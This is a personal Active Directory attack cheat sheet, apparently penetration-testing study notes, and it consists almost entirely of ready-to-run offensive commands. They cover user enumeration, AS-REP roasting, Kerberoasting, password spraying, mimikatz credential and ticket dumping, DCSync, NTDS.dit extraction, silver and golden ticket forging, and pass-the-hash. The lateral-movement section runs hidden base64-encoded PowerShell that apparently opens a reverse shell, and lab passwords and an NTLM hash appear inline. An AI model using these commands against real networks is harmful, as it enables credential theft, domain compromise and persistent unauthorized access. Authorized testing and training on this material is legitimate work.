AD Methodology

Workflow to Follow for AD.

RedTeaming_CheatSheet/windows-ad/Domain-Privilege-Escalation.md at main · 0xJs/RedTeaming_CheatSheetGitHub

WADComswadcoms.github.io

Enumeration

Nmap scan:

nmap -sC -sV -Pn <IP> 
nmap -sC -sV -Pn -oN <OUTPUT FILE> <IP>
sudo nmap -sU -Pn <IP>
sudo nmap -sU -Pn -oN <OUTPUT FILE> <IP>

Enumeration of SMB:

enum4linux -a <IP>
enum4linux -a -u 'guest' -p '' <IP>

Enumeration of share permissions:

smbmap -H <IP>

Connection to shares

smbclient //<IP>/<sharename> -N
smbclient //<IP>/<sharename> -U guest

Enumerate LDAP with Null Credentials

nmap -n -sV --script "ldap* and not brute" <IP>

Probing LDAP Further

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"

Responder for poisoning or MITM

sudo responder -I tun0

Completely no usernames

kerbrute userenum -d <DOMAIN> usernames.txt

Once we have usernames but no passwords

• AS-REP Roasting

• Password Spray with crackmapexec.

AS-REP Roasting and Cracking

impacket-GetNPUsers jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast

impacket-GetNPUsers jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

Get-DomainUser -PreauthNotRequired -verbose #for powerview

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast #crack hash

Password Spraying

crackmapexec smb/ldap/winrm -u users.txt -p <password> <IP>

Apart from these steps, check for web vulnerabilities and Windows SMB related exploits such as EternalBlue or something.

Once we have access to this, we can either:

• Regular Windows PE

• AD-related PE.

Generally, once I complete all of these AD-related Enumerations, I should have gotten access. Otherwise, I would refer to other checklists and begin again.

Time Skew

If the time on the DC is not correct, we need to follow the steps below to make it similar.

sudo timedatectl set-ntp 0
sudo rdate -n <IP of DC>

Net Command

Net (command)/Localgroup - Wikiversityen.wikiversity.org

Gather user information

Get all users in the domain

net user /domain

Get user information

net user <username> /domain

Get all groups in the domain

net group /domain

Get group information

net group "<group name>" /domain

Get all local group

net localgroup

Get all users in the local group

net localgroup <groupname>

Get account policy

net accounts

Gather Domain information

Get domain information

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Powershell script to craft the LDAP path

$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"
$LDAP

Powerview Commands

Import Module

Import-Module .\PowerView.ps1

Get domain information

Get-NetDomain

Get all user information

Get-NetUser

Get all user information but specific column

Get-NetUser | select <column name>

Get Service principal name

Get-NetUser -SPN | select samaccountname,serviceprincipalname

Get all group information

Get-NetGroup

Get specific group information

Get-NetGroup "<Group Name>"

Get group information but specific column

Get-NetGroup | select <column name>

Get computer information

Get-NetComputer

Find all computer that has local admin rights for current user

Find-LocalAdminAccess

Convert Security Identifiers (SID) to name

Convert-SidToName <SID>

Get object ACL

Get-ObjectAcl -Identify <username>

Get Active Directory Rights for a specific domain group

Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

List down all domain shares

Find-DomainShare

List down all domain shares with access

Find-DomainShare -CheckShareAccess

Network Shares

List down all shares for specific server

net view \\<SERVER HOSTNAME>

Enumerating SPNs (Service Principal Names)

setspn -L <username>

Automated Enumeration

Importing SharpHound

Import-Module .\Sharphound.ps1

Get Help Command

Get-Help Invoke-BloodHound

Collect all data

Invoke-BloodHound -CollectionMethod All -OutputDirectory <Output Directory> -OutputPrefix <Prefix for Output Files>

Cached AD Credentials

Dumping out the credentials of all logged-on users (mimikatz)

privilege::debug
sekurlsa::logonpasswords

Show all the tickets that are stored in the memory (mimikatz)

privilege::debug
sekurlsa::tickets

Cached Hashes (mimikatz)

privilege::debug
lsadump::cache

Authentication Attacks

Password Attacks

Password Spray using powershell script according to account policy

.\Spray-Passwords.ps1 -Pass <Password> -Admin -Verbose

Password Spray against AD Users using SMB

sudo crackmapexec smb <TARGET IP> -u <userlist/username> -p <password/passwordlist> -d <domain name> --continue-on-success

Password Spray using TGT

.\kerbrute_windows_amd64.exe passwordspray -d <domain name> <username/usernamelist> <password/passwordlist>

AS-REP Roasting

Get all users without Kerberos preauthentication

impacket-GetNPUsers -dc-ip <DC IP> -request -outputfile <output file> <domain name>/<username>

or

Get-DomainUser -PreauthNotRequired | select samaccountname

or

.\Rubeus.exe asreproast /nowrap

Cracking the Hash

sudo hashcat -m 18200 <hash file> <wordlist> -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting

Get all SPNs that able to be Kerberoasted

.\Rubeus.exe kerberoast /outfile:<output file>

or

sudo impacket-GetUserSPNs -request -dc-ip <DC IP> <domain name>/<username>

Cracking the hash

sudo hashcat -m 13100 <hash file> <wordlist> -r /usr/share/hashcat/rules/best64.rule --force

Sliver Tickets

Requires 3 different information:

1. SPN Password hash

2. Domain SID

3. Target SPN

SPN Password hash

On mimikatz,

privilege::debug
sekurlsa::logonpasswords

Find the SPN NTLM Hash

Domain SID

whoami /user

The full command

On mimikatz,

kerberos::golden /sid:<Domain SID> /domain:<Domain name> /ptt /target:<Target hostname>.<Domain name> /service:<Name of Service E.g. http> /rc4:<SPN Password Hash> /user:<username with privilege to the service>

To check

klist

Domain Controller Synchronization (DCSync)

Requires user to have Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes rights

By default, members of the Domain Admins, Enterprise Admins and Administrators group have these rights assigned

On mimikatz,

lsadump::dcsync /user:<domain name>\<username>

or On kali,

impacket-secretsdump -just-dc-user <TARGET USER> <domain name>/<username with rights>:'<password for that user>'@<DC IP>

impacket-secretsdump -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes

Crack the hash

hashcat -m 1000 <hash file> <wordlist> -r /usr/share/hashcat/rules/best64.rule --force

Lateral Movement Techniques

WMI and WinRM

Target User must be a domain user and a member of the Local Administrator Group for the targeted machine

Testing phase

wmic /node:<TARGET IP> /user:<TARGET USERNAME> /password:<TARGET USER PASSWORD> process call create "calc"

To execute

$username = '<TARGET USERNAME>';
$password = '<TARGET USER PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName <TARGET IP> -Credential $credential -SessionOption $Options
$Command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

or

winrs -r:<TARGET HOSTNAME> -u:<TARGET USERNAME> -p:<TARGET USER PASSWORD> "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

or

$username = '<TARGET USERNAME>';
$password = '<TARGET USER PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <TARGET IP> -Credential $credential
Enter-PSSession <ID>

PsExec

Requires 3 things to work:

1. Target User must be Local Administrator

2. ADMIN$ share must be available

3. File and Printer Sharing has to be turned on

./PsExec64.exe -i  \\<TARGET HOSTNAME> -u <TARGET DOMAIN>\<TARGET USERNAME> -p <TARGET USER PASSWORD> cmd

or

sudo proxychains impacket-psexec medtech.com/joe:Flowers1@172.16.188.11

Pass the Hash

Requires 4 things to work:

1. Target User must be Local Administrator

2. ADMIN$ share must be available

3. File and Printer Sharing has to be turned on

4. Requires the NTLM Hash of the target user

impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

Overpass the hash

This is used to gain a full Kerberos Ticket Granting Ticket (TGT)

Find the cached password hashes

On mimikatz,

privilege::debug
sekurlsa::logonpasswords

Create the process

On mimikatz:

sekurlsa::pth /user:<TARGET USERNAME> /domain:<TARGET DOMAIN NAME> /ntlm:<TARGET USER NTLM HASH> /run:powershell

Generate the ticket for targeted machine

net use \\<TARGET HOSTNAME>

then check with

klist

Entering the system

After generating the ticket, any tools that rely on Kerberos authentication will work

.\PsExec.exe \\<TARGET HOSTNAME> cmd

Pass the Ticket

This is used to reinject a TGS elsewhere on the network

Export out all the TGT/TGS from memory

On mimikatz,

privilege::debug
sekurlsa::tickets /export

List out all the generated tickets

dir *.kirbi

Reinject the ticket

kerberos::ptt <NAME OF TGS>
kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

then check with

klist

DCOM (Distributed Component Object Model)

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<TARGET IP>"))

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

Persistence Methods

Golden Ticket

Requires the NTLM Hash of krbtgt account

If the account is in the Domain Admin group

On mimikatz,

privilege::debug
lsadump::lsa /patch

To purge any old tickets

On mimikatz,

kerberos::purge

To inject the ticket

On mimikatz,

kerberos::golden /user:<TARGET USER> /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /krbtgt:<NTLM HASH OF krbtgt ACCOUNT> /ptt

Shadow Copies

Create a snapshot

vshadow.exe -nw -p  C:

Copy AD Database to C: drive root folder

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

Save the SYSTEM hive from Windows registry

reg.exe save hklm\system c:\system.bak

Dump all the NTML hashes

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

Bloodhound Custom Queries

https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.htmlbloodhound.readthedocs.io

Return all computers in the domain

MATCH (m:Computer) RETURN m

Return all users in the domain

MATCH (m:User) RETURN m

Return all active session in the domain

MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

Return all the users' group membership

MATCH p = (c:User)-[:MemberOf]->(m:Group) RETURN p 

Using evil-winrm to get shell

Using Password

evil-winrm -u <username> -p <password of user> -i <TARGET IP>

Using NTLM Hash

evil-winrm -u <username> -H <NTLM Hash of user> -i <TARGET IP>

Referrences

GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.GitHub